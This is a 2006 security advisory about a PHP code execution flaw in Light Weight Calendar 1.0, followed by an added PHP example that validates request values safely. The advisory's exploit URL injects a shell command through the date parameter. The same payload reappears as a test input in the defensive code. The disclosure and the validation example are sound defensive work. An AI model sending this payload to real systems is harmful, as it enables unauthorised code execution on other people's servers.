Computer Security
[EN] securityvulns.ru

From: Aliaksandr Hartsuyeu <alex_(at)_evuln.com>
Date: 16.01.2006
Subject: [eVuln] Light Weight Calendar PHP Code Execution

New eVuln Advisory:
Light Weight Calendar PHP Code Execution
http://evuln.com/vulns/29/summary.html

--------------------Summary----------------

Software: Light Weight Calendar
Software's Web Site: http://sourceforge.net/projects/lwcal/
Versions: 1.0
Critical Level: Dangerous
Type: PHP Code Execution
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)
eVuln ID: EV0029

-----------------Description---------------
Vulnerable script: cal.php

The eval() function is called with a user-defined parameter that is not properly sanitized. This can be used to execute arbitrary PHP code.

System access is possible.

--------------Exploit----------------------
PHP Code Execution example.

http://host/lwc/index.php?stam=1928504&date=20050901);%20echo%20(%60ls%20-la%60&View=month

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/29/summary.html

Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)
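
Added example, not part of the original advisory and not Light Weight Calendar's code: one way a script can accept the date and View request values without ever passing them to eval(). The function names, the eval() line shown in the comment, and the view names other than "month" are assumptions for illustration.

```php
<?php
// Added illustration, not Light Weight Calendar's code (PHP 7.1+).
// All function names here are hypothetical.
//
// Bug class from the advisory, shown only as a comment. This is a
// hypothetical line, not taken from cal.php: request data concatenated
// into a string that is handed to eval(), e.g.
//   eval('$ts = mktime(0, 0, 0, ' . $_GET['date'] . ');');
// The safer form below never evaluates request data as code.

/** Parse a YYYYMMDD value from the request; return null if invalid. */
function parse_calendar_date($raw): ?DateTimeImmutable
{
    // Rejects arrays (?date[]=x) and anything but exactly 8 ASCII digits.
    // \A and \z anchor the whole string; "$" would accept a trailing newline.
    if (!is_string($raw) || preg_match('/\A[0-9]{8}\z/', $raw) !== 1) {
        return null;
    }
    $y = (int) substr($raw, 0, 4);
    $m = (int) substr($raw, 4, 2);
    $d = (int) substr($raw, 6, 2);
    // checkdate() rejects impossible dates such as 20050231.
    if (!checkdate($m, $d, $y)) {
        return null;
    }
    return (new DateTimeImmutable('now'))->setDate($y, $m, $d)->setTime(0, 0, 0);
}

/** Map the View parameter onto an allowlist; unknown values fall back. */
function parse_view($raw): string
{
    // 'month' appears in the advisory's URL; the other names are assumed.
    $allowed = ['day', 'week', 'month', 'year'];
    return is_string($raw) && in_array($raw, $allowed, true) ? $raw : 'month';
}

// Constructed inputs; the second is the advisory's example value, URL-decoded.
$samples = ['20050901', '20050901); echo (`ls -la`', '20050231', "20050901\n", ['20050901']];
foreach ($samples as $raw) {
    $date = parse_calendar_date($raw);
    printf("%-32s %s\n", json_encode($raw), $date ? $date->format('Y-m-d') : 'rejected');
}
printf("View=%s\n", parse_view('unknown'));
```

Only the first sample is accepted; the validated value is used as a date object, so no request string is ever interpreted as PHP.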
